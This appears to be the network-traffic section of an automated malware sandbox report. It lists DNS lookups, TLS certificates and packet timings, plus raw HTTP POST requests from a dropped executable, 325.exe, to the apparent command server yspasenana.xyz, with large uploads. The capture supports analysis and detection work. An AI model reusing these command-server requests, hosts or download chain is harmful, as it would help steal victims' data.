                                                                                                                                                                            Jul 22, 2021 11:43:01.013252020 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.014991999 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.148030996 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.148221970 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210562944 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210608959 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210647106 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210685015 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210731983 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210752964 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210774899 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210813999 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210813999 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210853100 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210891008 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210918903 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.210927010 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210966110 CEST4434971552.217.201.169192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:01.210988998 CEST49715443192.168.2.352.217.201.169
                                                                                                                                                                            Jul 22, 2021 11:43:01.211005926 CEST4434971552.217.201.169192.168.2.3

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jul 22, 2021 11:42:50.436938047 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:50.497740984 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:51.506886005 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:51.556329966 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:53.869375944 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:53.933244944 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:55.227030993 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:55.279035091 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:56.549263000 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:56.598376989 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.664081097 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:58.675287962 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:58.717329979 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:58.733603001 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.322242022 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.694236040 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.755548954 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:42:59.934425116 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:42:59.983728886 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:00.422305107 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:06.890603065 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:06.942991972 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:08.491096973 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:08.543608904 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:15.305854082 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:15.357764006 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:16.421140909 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:16.480875969 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:17.391518116 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:17.443506002 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:18.342683077 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:18.402529001 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:19.320419073 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:19.380341053 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:22.690311909 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:22.748423100 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:27.981369019 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.054693937 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:28.617409945 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:28.674328089 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:29.461571932 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:29.515253067 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:39.283081055 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:39.342900991 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:50.319731951 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:50.370299101 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:51.512294054 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:51.565135956 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:57.058478117 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:57.131546974 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:43:59.928487062 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:43:59.988356113 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:04.846780062 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:04.907150984 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.823750973 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.884871960 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:06.892400026 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:06.953299999 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:11.579966068 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:11.641484976 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:12.352585077 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:12.412575006 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:31.821844101 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:31.893857956 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                            Jul 22, 2021 11:44:33.378647089 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                            Jul 22, 2021 11:44:33.436006069 CEST53521238.8.8.8192.168.2.3

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                            Jul 22, 2021 11:42:58.675287962 CEST192.168.2.38.8.8.80x574aStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.322242022 CEST192.168.2.38.8.8.80x554Standard query (0)is.gdA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.694236040 CEST192.168.2.38.8.8.80x65e1Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.422305107 CEST192.168.2.38.8.8.80xd23cStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:04.846780062 CEST192.168.2.38.8.8.80xda5eStandard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.823750973 CEST192.168.2.38.8.8.80xd22dStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.892400026 CEST192.168.2.38.8.8.80x9e5cStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:11.579966068 CEST192.168.2.38.8.8.80x4d94Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:12.352585077 CEST192.168.2.38.8.8.80xa170Standard query (0)yspasenana.xyzA (IP address)IN (0x0001)

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                            Jul 22, 2021 11:42:58.733603001 CEST8.8.8.8192.168.2.30x574aNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd104.25.234.53A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd172.67.83.132A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.391592026 CEST8.8.8.8192.168.2.30x554No error (0)is.gd104.25.233.53A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:42:59.755548954 CEST8.8.8.8192.168.2.30x65e1No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:43:00.481355906 CEST8.8.8.8192.168.2.30xd23cNo error (0)s3-w.us-east-1.amazonaws.com52.217.201.169A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:04.907150984 CEST8.8.8.8192.168.2.30xda5eNo error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.884871960 CEST8.8.8.8192.168.2.30xd22dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:06.953299999 CEST8.8.8.8192.168.2.30x9e5cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:11.641484976 CEST8.8.8.8192.168.2.30x4d94No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)
                                                                                                                                                                            Jul 22, 2021 11:44:12.412575006 CEST8.8.8.8192.168.2.30xa170No error (0)yspasenana.xyz212.224.105.105A (IP address)IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • yspasenana.xyz

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.349739212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:05.202037096 CEST6920OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 144
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 22, 2021 11:44:05.249474049 CEST6920INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:05.354886055 CEST6922INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:05 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 2e bb 94 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 75 42 c2 42 ef b6 2a 31 ad 84 48 3c e3 79 32 1e 8f c7 8f dd 55 1d 4f 3c 03 c7 04 9c 6d cc 85 ea a8 8f 8d 48 eb a4 e3 ba 8a 46 10 13 d5 32 72 85 24 69 a1 5c bb f9 8b 0b a5 85 db e8 75 55 67 80 e1 ae d7 35 28 4c a2 88 41 68 1f b4 66 62 ad e6 a0 12 14 aa 04 3e c0 6a 88 93 54 b2 02 ae f1 96 61 ca 75 e9 0f f9 d8 18 48 cc 14 48 6f ab 41 28 86 a2 51 aa d8 01 33 cb b2 56 76 53 40 fe d0 6e bf 77 7f 9f de fb 85 f7 d7 4c 28 4d 04 05 f3 25 d2 19 70 a4 1b 08 87 98 0a 2d 77 25 ca f2 ab 01 c7 8c 4a 54 b8 d2 2d 8a 71 0e 78 e3 be 6f bb 3e 48 46 38 7b 21 da b8 e0 f6 a5 24 3b d5 70 8f 60 27 b3 8b 21 3e 2e ff 04 aa 7f ec 69 99 42 d7 7d 6d 1f 54 b7 bd 15 e1 ea 48 77 9b eb 7c 4a 44 19 2c 75 b0 3d 11 96 9d 86 91 c4 18 2a e9 8c e8 48 5d c2 f7 5e 77 d9 51 5a 9a 39 ec 5d 7d f2 bd f9 6c fe 38 9e dc 7b 57 41 3f 49 46 44 93 e0 1e 29 e1 c1 80 68 cd a1 25 40 77 dd 83 c1 bf 33 2d 1c 67 69 1c 7c 32 8e 3b b9 e2 6c 88 3b c4 35 87 3d 12 58 e3 7c b7 fd 70 fb bd 0d d8 1c 49 6c b4 c1 63 02 92 38 be 89 73 46 24 04 67 bb 33 25 09 07 5f a7 21 c3 d2 9d 19 4f 95 c5 f8 26 92 85 76 91 fe d9 d7 44 96 ff f5 51 86 a6 32 94 99 6a 83 12 41 88 da 02 e0 89 3d 13 1e 32 0b 84 5f cd 9c 98 46 7d 00 8f 43 5e 26 95 63 1f 0e 2f 61 d4 99 49 33 26 ba bb 00 5c 3a c4 97 29 84 cc 8c 4e 12 61 01 34 06 21 99 74 26 82 06 3e 07 96 08 26 7f 0a d4 7e 5f 08 62 0c 53 0e ea 50 04 9e 18 64 20 cf 4f 05 f3 ca 99 20 77 12 d3 24 18 32 63 81 36 99 85 98 a1 a8 1e f5 71 38 83 25 b1 71 e4 37 b3 01 f9 a9 5c 59 40 3c ca 25 d3 56 6b 7e 88 66 96 30 18 49 b2 b6 8a 46 3f 66 eb 7d 30 2c 40 16 28 69 64 61 ff 07 11 21 6c cb c7 05 6a d0 3e 36 f5 01 6e 6e db 95 17 f6 de 4c c9 56 47 28 6e 6c 2a da f5 d4 10 41 9b 69 f6 93 54 0b b6 39 3c eb 23 3d 30 6a bb a3 0f 91 9a df 05 42 6b 59 04 8b fa 66 97 29 53 c2 78 6b 9e 06 7d 8d 36 ab 79 20 c9 33 1c 38 49 d1 ba be 40 e6 55 8c 32 f0 c2 b5 cd 84 3d 3c 4d 46 93 be 33 44 99 a0 2c 98 68 25 ba 83 b1 59 fb e0 78 5b 43 ab 18 98 03 c0 f9 a9 a9 81 c4 e7 cf 9d dc 25 1a 17 64 f9 cf bb aa fb 26 0f af 28 fa 88 29 8a 32 7c e5 f9 c7 c2 b2 cf 78 31 3b a1 f9 79 bb 52 31 b3 53 9e 2a 0b c9 b1 fa 3f e1 fd a9 19 49 22 71 65 3e 70 15 8c 40 6d 34 26 5f 9a 2d bd d5 ef 9a ad 10 69 f3 5d 73 03 3b f3 9f 11 ce 41 9b 17 05 10 36 bf b4 bf 1d ea 53 38 a4 69 c1 80 ce 06 74 ff 3e ec 2a 10 77 40 37 f8 ff 1f 84 2a d6 3f c5 17 c6 39 09 c6 4c c2 0a b7 35 ce 0d 9f 89 06 59 cf b4 28 df 80 a2 86 e9 22 4a cd 9e 68 d8 82 0c 6b 58 97 1b e1 84 c2 9e 27 d4 80 f8 90 00 dd aa e2 b8 63 08 e1 6e 59 37 06 0f de e2 ae bf f0 9c 05 d0 48 20 c7 35 33 04 73 c0 09 dd fc 42 b2 1a 78 53 44 41 23 c6 43 c3 ae 0d 5d a5 79 56 a8 60 46 38 38 b9 ea 1b 39 f9 75 06 56 b9 e9 53 09 20 4e 16 71 29 aa 3a e4 25 ea b4 42 ec 45 a5 7e 61 a6 77 2d 4d fb 18 e2 20 2c 3b 3d cd 1e 4e 21 72 41 a9 fb 5c 2c a9 d3 3a 52 c9 ba ee 9b 57 37 6f ea 8a fb 20 a3 ad 6e 8d dc d7 eb a7 de 5f e7 f1 c2 3e 8b 12 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 3e4Xm6+J-%\K.p{/lguBB*1H<y2UO<mHF2r$i\uUg5(LAhfb>jTauHHoA(Q3VvS@nwL(M%p-w%JT-qxo>HF8{!$;p`'!>.iB}mTHw|JD,u=*H]^wQZ9]}l8{WA?IFD)h%@w3-gi|2;l;5=X|pIlc8sF$g3%_!O&vDQ2jA=2_F}C^&c/aI3&\:)Na4!t&>&~_bSPd O w$2c6q8%q7\Y@<%Vk~f0IF?f}0,@(ida!lj>6nnLVG(nl*AiT9<#=0jBkYf)Sxk}6y 38I@U2=<MF3D,h%Yx[C%d&()2|x1;yR1S*?I"qe>p@m4&_-i]s;A6S8it>*w@7*?9L5Y("JhkX'cnY7H 53sBxSDA#C]yV`F889uVS Nq):%BE~aw-M ,;=N!rA\,:RW7o n_>0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.349741212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:11.703536034 CEST6928OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 1125491
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Jul 22, 2021 11:44:11.753475904 CEST6928INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:12.285859108 CEST8049INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:12 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 37 65 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce 51 0a 83 40 0c 04 d0 ab c8 1e c0 fc 2f eb 7e 08 bd 80 9e 40 da 50 05 37 09 3b 69 69 6f af 2d b6 fe 0d 03 f3 98 84 78 91 27 af 6a dc bc ca 2a 88 e8 c2 ec 6e 91 08 d7 99 cb 84 76 ef a1 93 b5 5a ef f4 09 c4 c7 82 42 4e 88 bd de de 39 8d ec 3b b4 54 95 c2 e2 03 c3 54 70 98 7f d1 b9 d8 a3 2e 5f 29 50 4e f4 5b d3 79 23 6f 17 76 26 42 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 7eEQ@/~@P7;iio-x'j*nvZBN9;TTp._)PN[y#ov&B0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.349742212.224.105.10580C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jul 22, 2021 11:44:12.465971947 CEST8050OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                            Host: yspasenana.xyz
                                                                                                                                                                            Content-Length: 1125483
                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jul 22, 2021 11:44:12.515531063 CEST8050INHTTP/1.1 100 Continue
                                                                                                                                                                            Jul 22, 2021 11:44:13.002619982 CEST9171INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 22 Jul 2021 09:44:12 GMT
                                                                                                                                                                            Content-Type: text/xml; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                            Keep-Alive: timeout=3
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0


                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                            Jul 22, 2021 11:42:58.915039062 CEST88.99.66.31443192.168.2.349711CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Jul 22, 2021 11:42:59.480372906 CEST104.25.234.53443192.168.2.349712CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jun 11 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Sat Jun 11 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                                            Jul 22, 2021 11:43:00.024015903 CEST104.192.141.1443192.168.2.349713CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 27 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Mon May 23 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                            Jul 22, 2021 11:43:00.820909977 CEST52.217.201.169443192.168.2.349715CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 11 01:00:00 CET 2021 Tue Dec 08 13:05:07 CET 2015Sat Feb 12 00:59:59 CET 2022 Sat May 10 14:00:00 CEST 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
